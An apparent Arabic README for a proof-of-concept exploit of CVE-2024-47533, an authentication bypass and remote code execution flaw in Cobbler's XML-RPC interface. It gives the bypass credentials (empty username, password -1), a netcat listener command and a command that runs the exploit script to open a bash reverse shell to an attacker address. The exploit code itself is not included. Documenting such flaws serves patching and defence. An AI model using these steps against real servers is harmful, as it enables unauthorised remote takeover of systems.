
CVE-2024-47533 هي ثغرة أمنية خطيرة لتجاوز المصادقة في Cobbler (الإصدارات 3.0.0 حتى ما قبل 3.2.3 و3.3.7) تسمح بتنفيذ تعليمات برمجية عن بُعد دون مصادقة عبر واجهة XMLRPC.
⚠️ تنفيذ تعليمات برمجية عن بُعد خطير عبر تجاوز المصادقة في Cobbler
🛠️ تنفيذ الإثبات العملي بواسطة @dollarboysushil
Cobbler، خادم تثبيت Linux الذي يتيح الإعداد السريع لبيئات تثبيت الشبكة، يحتوي على ثغرة مصادقة في الإصدارات من 3.0.0 وحتى (وليس بما في ذلك) 3.2.3 و 3.3.7. تقوم الدالة utils.get_shared_secret() دائمًا بإرجاع -1، مما يسمح لأي شخص بالاتصال بواجهة XML-RPC الخاصة بـ Cobbler باستخدام اسم مستخدم فارغ ('') وكلمة مرور -1. وهذا يسمح للمهاجم الذي لديه وصول إلى الشبكة بالحصول على سيطرة كاملة على خادم Cobbler. تم إصلاح الثغرة في الإصدارين 3.2.3 و 3.3.7.
تحدث الثغرة بسبب معالجة غير صحيحة للسر المشترك في دالة utils.get_shared_secret()، والتي تُرجع دائمًا -1، مما يتجاوز المصادقة فعليًا. وهذا يسمح لأي مستخدم على الشبكة بالاتصال بواجهة XMLRPC الخاصة بـ Cobbler باستخدام بيانات اعتماد فارغة وتنفيذ أوامر عشوائية.
http://<target>:25151/ — نقطة نهاية واجهة برمجة تطبيقات XMLRPC الخاصة بـ Cobbler
يدعم script الاستغلال العديد من أكواد الصدفة العكسية بما في ذلك:
nc, nc2)ابدأ مُستمع Netcat على جهازك:
nc -lvnp 4444

قم بتشغيل script الاستغلال CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

عند التنفيذ الناجح، ستتصل الصدفة العكسية مرة أخرى بالمُستمع، مما يمنح المهاجم وصولاً عن بُعد إلى الخادم.
